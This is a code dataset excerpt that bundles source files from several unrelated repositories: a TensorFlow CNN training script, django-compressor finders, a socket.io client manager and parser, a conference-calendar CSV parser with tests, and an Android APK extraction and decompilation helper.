b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M5_plus():
# M5+ 64-128-256-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 3 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([64]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*64
w_c2 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([128]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*128
w_c3 = tf.Variable(tf.random_normal([3, 3, 128, 256], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([256]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
    # Fully connected layer, flattened input 8*8*256
w_d = tf.Variable(tf.random_normal([8 * 8 * 256, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv3, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M5_sub():
# M5- 32-64-128-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 3 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([32]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*32
w_c2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([64]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*64
w_c3 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([128]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
    # Fully connected layer, flattened input 8*8*128
w_d = tf.Variable(tf.random_normal([8 * 8 * 128, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv3, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M6_sub():
# M6- 32-64-128-256-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 4 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 32], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([32]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*32
w_c2 = tf.Variable(tf.random_normal([3, 3, 32, 64], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([64]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*64
w_c3 = tf.Variable(tf.random_normal([3, 3, 64, 128], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([128]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
# 8*8*128
w_c4 = tf.Variable(tf.random_normal([3, 3, 128, 256], stddev = 0.01))
b_c4 = tf.Variable(tf.zeros([256]))
conv4 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv3, w_c4, strides = [1, 1, 1, 1], padding = 'SAME'), b_c4))
conv4 = tf.nn.max_pool(conv4, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv4 = tf.nn.dropout(conv4, keep_prob)
    # Fully connected layer, flattened input 4*4*256
w_d = tf.Variable(tf.random_normal([4 * 4 * 256, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv4, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
def M6_plus():
# M6+ 40-80-160-320-2fc
x = tf.reshape(X, shape = [-1, 64, 64, 1])
# 4 conv layers
w_c1 = tf.Variable(tf.random_normal([3, 3, 1, 40], stddev = 0.01))
b_c1 = tf.Variable(tf.zeros([40]))
conv1 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides = [1, 1, 1, 1], padding = 'SAME'), b_c1))
conv1 = tf.nn.max_pool(conv1, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 32*32*40
w_c2 = tf.Variable(tf.random_normal([3, 3, 40, 80], stddev = 0.01))
b_c2 = tf.Variable(tf.zeros([80]))
conv2 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides = [1, 1, 1, 1], padding = 'SAME'), b_c2))
conv2 = tf.nn.max_pool(conv2, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
# 16*16*80
w_c3 = tf.Variable(tf.random_normal([3, 3, 80, 160], stddev = 0.01))
b_c3 = tf.Variable(tf.zeros([160]))
conv3 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides = [1, 1, 1, 1], padding = 'SAME'), b_c3))
conv3 = tf.nn.max_pool(conv3, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv3 = tf.nn.dropout(conv3, keep_prob)
# 8*8*160
w_c4 = tf.Variable(tf.random_normal([3, 3, 160, 320], stddev = 0.01))
b_c4 = tf.Variable(tf.zeros([320]))
conv4 = tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(conv3, w_c4, strides = [1, 1, 1, 1], padding = 'SAME'), b_c4))
conv4 = tf.nn.max_pool(conv4, ksize = [1, 2, 2, 1], strides = [1, 2, 2, 1], padding = 'SAME')
conv4 = tf.nn.dropout(conv4, keep_prob)
    # Fully connected layer, flattened input 4*4*320
w_d = tf.Variable(tf.random_normal([4 * 4 * 320, 1024], stddev = 0.01))
b_d = tf.Variable(tf.zeros([1024]))
dense = tf.reshape(conv4, [-1, w_d.get_shape().as_list()[0]])
dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))
dense = tf.nn.dropout(dense, keep_prob)
w_out = tf.Variable(tf.random_normal([1024, category], stddev = 0.01))
b_out = tf.Variable(tf.zeros([category]))
out = tf.add(tf.matmul(dense, w_out), b_out)
return out
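# Added note (not part of the original script): every M* variant applies 2x2
# max-pooling after each conv block, so the 64x64 input shrinks
# 64 -> 32 -> 16 -> 8 -> 4. That is why the first fully connected weight is
# sized 16*16*C for the two-conv models, 8*8*C for three convs and 4*4*C for
# four convs, where C is the channel count of the last conv layer.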
def train_cnn(output):
# output = ascii_cnn()
loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(logits = output, labels = Y))
optimizer = tf.train.AdamOptimizer(learning_rate = 0.001).minimize(loss)
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(output, 1), tf.argmax(Y, 1)), tf.float32))
    # Create a saver to persist the model
saver = tf.train.Saver()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver.restore(sess, "./model/")
acc = 0.0
for i in range(2000):
image_batch, label_batch = getRandomData(train_list, 300)
sess.run([optimizer, loss],feed_dict = {X: image_batch, Y: label_batch, keep_prob: 0.5})
print("\r正在训练第 %d 步 ,最近一次测试准确率为%f, 每 5 步更新一次准确率"%(i+1,acc), end="")
if (i+1)%5==0:
image_batch, label_batch = getRandomData(test_list, 200)
acc = accuracy.eval({X: image_batch, Y: label_batch, keep_prob: 1.})
# print("训练第%d步,准确率为:%f"%(i+1,acc))
# if (i+1)%200==0:
# saver.save(sess, "./model2/")
# saver.restore(sess, "./model/")
print("\n----训练完毕,正在进行十次测试----")
nums = []
for i in range(10):
image_batch, label_batch = getRandomData(test_list, 249)
acc = accuracy.eval({X: image_batch, Y: label_batch, keep_prob: 1.})
nums.append(acc)
print("第%d次测试结果:%f"%(i+1,acc))
print(nums)
ac = (np.mean(nums))
print("测试完毕,平均准确率为:%f" % ac)
return ac
def test_cnn(output):
    # Create a saver to persist the model
saver = tf.train.Saver()
accuracy = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(output, 1), tf.argmax(Y, 1)), tf.float32))
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
saver.restore(sess, "./model/")
for i in range(10):
image_batch, label_batch = getRandomData(test_list, 249)
acc = accuracy.eval({X: image_batch, Y: label_batch, keep_prob: 1.})
print("第%d次测试结果:%f"%(i+1,acc))
def tesify_model(output):
ac_list = []
for i in range(5):
print("--------第%d次模型测试---------" % (i+1))
t1 = time.time()
ac = train_cnn(output)
ac_list.append(ac)
t2 = time.time()
print("第%d次模型测试 消耗时间: %f" % (i+1, t2 - t1))
print(ac_list)
print(np.mean(ac_list))
if __name__ == '__main__':
Model5_plus = M5_plus()
train_cnn(Model5_plus)
# getRandomData(1)
# getDataBatch(2)
# convert_pic("G:/Java资料/Code/Python/digital_imgae_processing_design/data_test/test2/0.jpg")
```
|
{
"source": "jezeniel/django-compressor-parceljs",
"score": 2
}
|
#### File: django-compressor-parceljs/compressor/finders.py
```python
from compressor.utils import staticfiles
from compressor.storage import CompressorFileStorage
import os
from django.conf import settings
from django.core.files.storage import (
FileSystemStorage,
)
from collections import OrderedDict
from django.core.checks import Error
from django.utils._os import safe_join
from django.contrib.staticfiles import utils
class CompressorFinder(staticfiles.finders.BaseStorageFinder):
"""
A staticfiles finder that looks in COMPRESS_ROOT
for compressed files, to be used during development
with staticfiles development file server or during
deployment.
"""
storage = CompressorFileStorage
def list(self, ignore_patterns):
return []
searched_locations = []
class PrivateFileSystemFinder(staticfiles.finders.BaseFinder):
"""
A static files finder that uses the ``COMPRESS_PRIVATE_DIRS`` setting
to locate files.
"""
def __init__(self, app_names=None, *args, **kwargs):
# List of locations with static files
self.locations = []
# Maps dir paths to an appropriate storage instance
self.storages = OrderedDict()
for root in settings.COMPRESS_PRIVATE_DIRS:
if isinstance(root, (list, tuple)):
prefix, root = root
else:
prefix = ''
if (prefix, root) not in self.locations:
self.locations.append((prefix, root))
for prefix, root in self.locations:
filesystem_storage = FileSystemStorage(location=root)
filesystem_storage.prefix = prefix
self.storages[root] = filesystem_storage
super().__init__(*args, **kwargs)
def check(self, **kwargs):
errors = []
if not isinstance(settings.COMPRESS_PRIVATE_DIRS, (list, tuple)):
errors.append(Error(
'The COMPRESS_PRIVATE_DIRS setting is not a tuple or list.',
hint='Perhaps you forgot a trailing comma?',
id='staticfiles.E001',
))
for root in settings.COMPRESS_PRIVATE_DIRS:
if isinstance(root, (list, tuple)):
prefix, root = root
if prefix.endswith('/'):
errors.append(Error(
'The prefix %r in the COMPRESS_PRIVATE_DIRS setting must '
'not end with a slash.' % prefix,
id='staticfiles.E003',
))
if settings.STATIC_ROOT and os.path.abspath(settings.STATIC_ROOT) == os.path.abspath(root):
errors.append(Error(
'The COMPRESS_PRIVATE_DIRS setting should not contain the '
'STATIC_ROOT setting.',
id='staticfiles.E002',
))
return errors
def find(self, path, all=False):
"""
Look for files in the extra locations as defined in PRIVATE_DIRS.
"""
matches = []
for prefix, root in self.locations:
if root not in searched_locations:
searched_locations.append(root)
matched_path = self.find_location(root, path, prefix)
if matched_path:
if not all:
return matched_path
matches.append(matched_path)
return matches
def find_location(self, root, path, prefix=None):
"""
Find a requested static file in a location and return the found
absolute path (or ``None`` if no match).
"""
if prefix:
prefix = '%s%s' % (prefix, os.sep)
if not path.startswith(prefix):
return None
path = path[len(prefix):]
path = safe_join(root, path)
if os.path.exists(path):
return path
def list(self, ignore_patterns):
"""
List all files in all locations.
"""
for prefix, root in self.locations:
storage = self.storages[root]
for path in utils.get_files(storage, ignore_patterns):
yield path, storage
```
|
{
"source": "jezeniel/python-socketio-client",
"score": 2
}
|
#### File: python-socketio-client/socketio_client/manager.py
```python
from engineio_client.emitter import Emitter
from engineio_client.client import Client as EngineIOClient
from engineio_client.utils import format_long
from .parser import Parser, ParserException, PacketException
from .socket import Socket
import gevent
import logging
logger = logging.getLogger(__name__)
class Manager(Emitter):
def __init__(self, scheme, hostname, port, reconnection=True, reconnection_delay=3.0,
auto_connect=True, parser=None, **kwargs):
"""
scheme: URI scheme
hostname: Hostname of the server
port: Port of the server
reconnection: Automatically reconnect after disconnect
        reconnection_delay: How long to wait between reconnection attempts, in seconds (float)
auto_connect: Automatically connect at creation
"""
super(Manager, self).__init__()
self.scheme = scheme
self.hostname = hostname
self.port = port
self.reconnection = reconnection
self.reconnection_delay = reconnection_delay
self.auto_connect = auto_connect
self.parser = parser or Parser()
self.engine_kwargs = kwargs
self.engine_kwargs.setdefault('path', '/socket.io')
self.state = 'closed'
self.sockets = set()
self.engine = None
self.reconnecting = False
self.skipping_reconnect = False
self.reconnect_task = False
if self.auto_connect:
self.connect()
def setup_engine_handlers(self):
self.engine.on('open', self.handle_open)
self.engine.on('error', self.handle_error)
self.engine.on('message', self.handle_message)
self.engine.on('close', self.handle_close)
def cleanup_engine_handlers(self):
self.engine.off('open', self.handle_open)
self.engine.off('error', self.handle_error)
self.engine.off('message', self.handle_message)
self.engine.off('close', self.handle_close)
def connect(self):
if self.state in ['opening', 'open']:
return
self.state = 'opening'
self.skip_reconnect(False)
self.engine = EngineIOClient(self.scheme, self.hostname, self.port, **self.engine_kwargs)
self.setup_engine_handlers()
self.engine.open()
def disconnect(self):
logger.debug("Disconnecting")
self.reconnecting = False
self.skip_reconnect(True)
self.state = 'closing'
if self.engine:
self.engine.close()
def send_packet(self, packet):
logger.debug(format_long("Sending packet: %s", packet))
items = self.parser.encode(packet)
binary = False
for item in items:
self.engine.send(item, binary)
binary = True # Attachments are always considered binary
def socket(self, namespace):
return Socket(namespace, self)
def attach_socket(self, socket):
self.sockets.add(socket)
def detach_socket(self, socket):
logger.debug("Detach socket")
self.sockets.discard(socket)
if not self.sockets:
self.disconnect()
@property
def id(self):
return self.engine.id
def handle_open(self):
if self.state == 'opening':
logger.debug("Connected")
self.state = 'open'
self.emit('open')
if self.reconnecting:
self.emit('reconnect')
self.reconnecting = False
def handle_error(self, error):
if self.state == 'opening':
logger.warning("Connect error")
self.state = 'closed'
self.emit('connect_error', error)
if self.reconnecting:
logger.warning("Reconnect error")
self.emit('reconnect_error', error)
self.reconnecting = False
self.reconnect()
elif self.reconnection:
self.reconnect()
else:
logger.warning("Error: %s", error)
self.emit('error', error)
def handle_message(self, message):
if self.state != 'open':
return
try:
packet = self.parser.decode(message)
if packet:
self.handle_packet(packet)
except (ParserException, PacketException) as e:
logger.warning("Received invalid message or sequence, ignoring: %s", e)
def handle_packet(self, packet):
if self.state != 'open':
return
logger.debug(format_long("Received packet: %s", packet))
self.emit('packet', packet)
def handle_close(self):
logger.debug("Handle close")
if self.state != 'closing' and self.state != 'open':
return
logger.debug("Disconnected")
self.state = 'closed'
self.emit('close')
self.cleanup_engine_handlers()
if self.reconnection:
self.reconnect()
def skip_reconnect(self, value):
self.skipping_reconnect = value
if self.skipping_reconnect:
self.stop_task(self.reconnect_task)
def do_reconnect(self):
if self.state in ['opening', 'open']:
return
logger.debug("Reconnect")
self.connect()
def reconnect(self):
logger.debug("Delay reconnect")
if self.reconnecting:
logger.debug("Already reconnecting")
return
if self.skipping_reconnect:
logger.debug("Skipping reconnect because user disconnected")
return
self.reconnecting = True
self.reconnect_task = self.start_task(self.do_reconnect, delay=self.reconnection_delay)
def start_task(self, func, delay=0, *args, **kwargs):
return gevent.spawn_later(delay, func, *args, **kwargs)
def stop_task(self, task):
if task:
task.kill(False)
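# Illustrative usage sketch (added; the handler wiring below is an assumption
# based on the Emitter base class, not taken from the original project):
#
#     manager = Manager('http', 'localhost', 3000, reconnection_delay=1.0)
#     chat = manager.socket('/chat')   # namespaced Socket bound to this manager
#     manager.on('reconnect', lambda: logger.info('reconnected'))
#
# With auto_connect left at its default, the engine.io transport is opened in
# __init__; otherwise call manager.connect() explicitly.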
```
#### File: python-socketio-client/socketio_client/parser.py
```python
from engineio_client.emitter import Emitter
import six
import re
import json
import functools
import logging
logger = logging.getLogger(__name__)
class Packet(object):
CONNECT = 0
DISCONNECT = 1
EVENT = 2
ACK = 3
ERROR = 4
BINARY_EVENT = 5
BINARY_ACK = 6
def __init__(self, type=None, data=None, namespace=None, id=None):
self.type = type
self.data = data
self.namespace = namespace or '/'
self.id = id
@property
def type_string(self):
return {
self.CONNECT: 'connect',
self.DISCONNECT: 'disconnect',
self.EVENT: 'event',
self.ACK: 'ack',
self.ERROR: 'error',
self.BINARY_EVENT: 'binary_event',
self.BINARY_ACK: 'binary_ack'
}[self.type]
def __str__(self):
return ' - '.join([str(i) for i in [self.type_string, self.id, self.namespace, self.data] if i])
PATTERN = '^'
PATTERN += '([0-6])' # type
PATTERN += '(?:(\d+)-)?' # number of attachments (optional)
PATTERN += '(?:(/[^,]+),?)?' # namespace (optional)
PATTERN += '(\d*)' # message id (optional)
PATTERN += '(.*)' # data
PATTERN += '$'
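# Added example (illustrative; the sample packet is an assumption, not taken
# from the original project): for the string '2/chat,13["msg",{"ok":1}]'
# re.findall(PATTERN, ...) returns [('2', '', '/chat', '13', '["msg",{"ok":1}]')],
# i.e. an EVENT packet with no attachments, namespace '/chat', id 13 and a JSON
# payload.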
class Parser(object):
def __init__(self):
self.reset()
def reset(self):
self.packet = None
self.raw_data = None
self.num_attachments = 0
self.attachments = []
def decode(self, bytes):
if not self.packet:
packet_type, num_attachments, namespace, packet_id, data = self.decode_packet(bytes)
self.packet = Packet(type=packet_type, namespace=namespace, id=packet_id)
self.raw_data = data
self.num_attachments = num_attachments
else:
self.attachments.append(bytes)
if self.num_attachments != len(self.attachments):
return None
packet = self.packet
packet.data = self.construct_data(self.raw_data, self.attachments)
self.reset()
return packet
def decode_packet(self, bytes):
matches = re.findall(PATTERN, bytes)
if not matches:
raise ParserException("Decoded packet is invalid: %s" % repr(bytes))
items = matches[0]
packet_type = int(items[0])
num_attachments = int(items[1]) if items[1] else 0
namespace = items[2]
packet_id = int(items[3]) if items[3] else None
data = json.loads(items[4]) if items[4] else None
return packet_type, num_attachments, namespace, packet_id, data
def construct_data(self, data, attachments):
ret = data
if isinstance(data, list):
ret = [self.construct_data(item, attachments) for item in data]
elif isinstance(data, dict):
if data.get('_placeholder', False) and 0 <= data.get('num', -1) < len(attachments):
ret = bytearray(attachments[data['num']])
else:
ret = {key: self.construct_data(value, attachments) for key, value in six.iteritems(data)}
return ret
def encode(self, packet):
bytes = six.text_type()
data, attachments = self.deconstruct_data(packet.data)
if attachments:
bytes += six.text_type(len(attachments)) + '-'
if packet.type == Packet.EVENT:
packet.type = Packet.BINARY_EVENT
elif packet.type == Packet.ACK:
packet.type = Packet.BINARY_ACK
bytes = six.text_type(packet.type) + bytes
if packet.namespace and packet.namespace != '/':
bytes += packet.namespace
if packet.id or data:
bytes += ','
if packet.id is not None:
bytes += six.text_type(packet.id)
if data is not None:
bytes += json.dumps(data, separators=(',', ':'))
return [bytes] + attachments
def deconstruct_data(self, data, attachments=None):
if attachments is None:
attachments = []
ret = data
if isinstance(data, bytearray):
attachments.append(data)
ret = {'_placeholder': True, 'num': len(attachments) - 1}
elif isinstance(data, (tuple, list)):
ret = [self.deconstruct_data(item, attachments)[0]
for item in data]
elif isinstance(data, dict):
ret = {key: self.deconstruct_data(value, attachments)[0]
for key, value in six.iteritems(data)}
return ret, attachments
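# Added note (illustrative): deconstruct_data swaps every bytearray for a
# {'_placeholder': True, 'num': n} marker and collects the attachments, e.g.
#     deconstruct_data(['img', bytearray(b'\x00')])
#     -> (['img', {'_placeholder': True, 'num': 0}], [bytearray(b'\x00')])
# construct_data performs the reverse substitution on the receiving side.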
class ParserException(Exception):
pass
class PacketException(Exception):
pass
```
|
{
"source": "jezhiggins/conference-calendar",
"score": 3
}
|
#### File: jezhiggins/conference-calendar/csv_calendar.py
```python
from typing import Set
from datetime import date
from csv import DictReader
from models import Event
HEADER_NAMES = ['start_date', 'end_date', 'title', 'website', 'description']
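# Illustrative CSV layout (added; the example values are assumptions):
#
#   start_date,end_date,title,website,description
#   2020-03-01,2020-03-02,ExampleConf,https://example.org,a sample conference
#
# Dates must be ISO formatted (YYYY-MM-DD); an invalid date raises MalformedCSV.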
class MalformedCSV(Exception):
"""
Raised if the input CSV is malformed.
"""
def parse_events(csv_file):
return CsvParser(csv_file).parse_events()
class CsvParser:
def __init__(self, csv_file):
self.csv_file = csv_file
def parse_events(self) -> Set[Event]:
"""
Parse a CSV file and return a list of events
"""
results = set()
csv_reader = DictReader(self.csv_file)
if csv_reader.fieldnames != HEADER_NAMES:
raise MalformedCSV(f'Expected header to equal {HEADER_NAMES} but got {csv_reader.fieldnames}')
for row in csv_reader:
try:
start_date = date.fromisoformat(row['start_date'])
end_date = date.fromisoformat(row['end_date'])
website = row['website']
description = row['description']
title = row['title']
except (KeyError, ValueError) as exc:
raise MalformedCSV from exc
event = Event(
start_date=start_date,
end_date=end_date,
website=website,
description=description,
title=title
)
results.add(event)
return results
```
#### File: jezhiggins/conference-calendar/test_csv_calendar.py
```python
from datetime import date
from pathlib import Path
from csv_calendar import parse_events, MalformedCSV
from models import Event
import pytest
def test_parsing_valid_events():
with open(Path('test_data', '2020.csv')) as csv_file:
events = parse_events(csv_file)
expected_events = set((
Event(
title='expected1',
start_date=date(2020, 3, 1),
end_date=date(2020, 3, 2),
website='https://www.google.com',
description='test conference'
),
Event(
title='expected2',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='another test conference'
),
))
assert events == expected_events
def test_parsing_empty_csv():
with open(Path('test_data', 'empty.csv')) as csv_file:
events = parse_events(csv_file)
assert events == set()
@pytest.mark.parametrize("filename", ['invalid_date.csv', 'missing_header.csv'])
def test_malformed_csv(filename):
with open(Path('test_data', filename)) as csv_file:
with pytest.raises(MalformedCSV):
parse_events(csv_file)
```
#### File: jezhiggins/conference-calendar/test_sync.py
```python
from sync import (
plan_changes,
Event, Plan,
Syncer
)
from datetime import date
from unittest.mock import Mock
def test_edit_event():
original_event = Event(
title='original',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='another test conference'
)
changed_event = Event(
title='changed',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='updated description'
)
unchanged_event = Event(
title='unchanged',
start_date=date(2020, 3, 1),
end_date=date(2020, 3, 2),
website='https://www.google.com',
description='test conference'
)
existing_events = {
unchanged_event: 1,
original_event: 2,
}
desired_events = set((
unchanged_event,
changed_event
))
plan = plan_changes(
existing_events=existing_events,
desired_events=desired_events
)
assert plan.to_add == set((changed_event,))
assert plan.to_remove == set((2,))
def test_nothing_to_change():
event1 = Event(
title='event1',
start_date=date(2020, 3, 1),
end_date=date(2020, 3, 2),
website='https://www.google.com',
description='test conference'
)
event2 = Event(
title='event2',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='another test conference'
)
events = set((
event1,
))
plan = plan_changes(
existing_events={
event1: 1,
event2: 2
},
desired_events=set((event1, event2))
)
assert plan.to_add == set()
assert plan.to_remove == set()
def test_syncer_obeys_the_plan():
changed_event = Event(
title='changed',
start_date=date(2020, 3, 2),
end_date=date(2020, 3, 4),
website='https://www.google.com',
description='updated description'
)
removed_event_id = 123
plan = Plan(
to_add=set((changed_event,)),
to_remove=set((removed_event_id,))
)
calendar_api = Mock()
csv_parser = Mock()
planner = Mock()
calendar_api.add = Mock()
calendar_api.remove = Mock()
planner.plan = Mock(return_value=plan)
syncer = Syncer(calendar_api, csv_parser, planner)
syncer.sync()
calendar_api.add.assert_called_once_with(changed_event)
calendar_api.remove.assert_called_once_with(removed_event_id)
```
|
{
"source": "jeziellago/android-sec-box",
"score": 3
}
|
#### File: secbox/apkextract/check_adb.py
```python
import os
import subprocess
import urllib3
import shutil
import sys
from zipfile import ZipFile
PLATFORM_TOOLS_LINUX_URL= "https://dl.google.com/android/repository/platform-tools_r29.0.6-linux.zip"
PLATFORM_TOOLS_MAC_URL = "https://dl.google.com/android/repository/platform-tools-latest-darwin.zip"
def get_platformtools_url_from_system():
if sys.platform.startswith('linux'):
return PLATFORM_TOOLS_LINUX_URL
else:
return PLATFORM_TOOLS_MAC_URL
def has_adb_installed(command):
try:
proc = subprocess.Popen([command, "--version"],stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
proc.wait()
return True
except:
return False
def download_platform_tools():
print('[*] Downloading platform-tools ...')
pm = urllib3.PoolManager()
request = pm.request('GET', get_platformtools_url_from_system(), preload_content=False)
filename = "platform-tools.zip"
with request, open(filename, 'wb') as out_file:
shutil.copyfileobj(request, out_file)
print('[-] Download platform-tools finished')
with ZipFile(filename, 'r') as zipObj:
print('[-] Extracting ' + filename)
zipObj.extractall()
print('[-] File "%s" extracted.' % filename)
os.system('chmod +x platform-tools/adb')
if has_adb_installed('platform-tools/adb'):
print("[>>] Android Debug Bridge (ADB) installed!")
def check_adb():
print("[!] Checking installation of Android Debug Bridge (ADB) ...")
adb = 'adb'
platform_tools_adb = 'platform-tools/adb'
if has_adb_installed(adb):
print("[>>] Android Debug Bridge (ADB) from environment [OK]")
return adb
elif has_adb_installed(platform_tools_adb):
print("[>>] Android Debug Bridge (ADB) from %s [OK]" % platform_tools_adb)
return platform_tools_adb
else:
print("[x] Android Debug Bridge (ADB) Not Found!")
download_platform_tools()
return platform_tools_adb
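# Illustrative usage sketch (added, not part of the original module): check_adb()
# returns the adb command to invoke, downloading platform-tools on demand.
if __name__ == '__main__':
    adb_command = check_adb()
    print('[>>] Using adb command: %s' % adb_command)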
```
#### File: secbox/app/secbox.py
```python
import os
from time import sleep
from .actionbox import extract_apk, decompile_only_sources, decompile_only_resources, decompile_all, recompile_apk
class SecBox:
def __init__(self):
self.__create_states__()
self.menu_options = []
self.__add_menu_option__('Extract apk from device', extract_apk)
self.__add_menu_option__('Decompile only sources from apk', decompile_only_sources)
self.__add_menu_option__('Decompile only resources from apk', decompile_only_resources)
self.__add_menu_option__('Decompile all from apk', decompile_all)
self.__add_menu_option__('Recompile modified apk from folder', recompile_apk)
def start(self):
try:
self.current_state = self.STATE_IDLE
while True:
self.__draw_header__()
self.__handle_state__()
except KeyboardInterrupt:
print('\n<!> Exiting... Bye :)')
exit()
def __handle_state__(self):
if self.current_state == self.STATE_IDLE:
self.__draw_menu__()
option = input('\n\n::> ')
self.__select_menu_option__(option)
else: pass
def __select_menu_option__(self, option):
action = None
for menu in self.menu_options:
if option == str(menu["id"]):
action = menu["action"]
break
if action:
self.current_state = self.STATE_PROCESSING
action()
self.current_state = self.STATE_IDLE
input('\n[!] Press any key to [MENU]::>')
def __create_states__(self):
self.STATE_IDLE = 0
self.STATE_PROCESSING = 1
def __add_menu_option__(self, option, action):
next_option_id = len(self.menu_options) + 1
self.menu_options.append({
"id": next_option_id,
"description": option,
"action": action
})
def __draw_header__(self):
os.system('clear')
print(
""" Welcome to
_________ ___.
/ _____/ ____ ____\_ |__ _______ ___
\_____ \_/ __ \_/ ___\| __ \ / _ \ \/ /
/ \ ___/\ \___| \_\ ( <_> > <
/_______ /\___ >\___ >___ /\____/__/\_ \\
\/ \/ \/ \/ \/
powered by @jeziellago
""")
def __draw_menu__(self):
print('\t[ MENU ]')
for menu in self.menu_options:
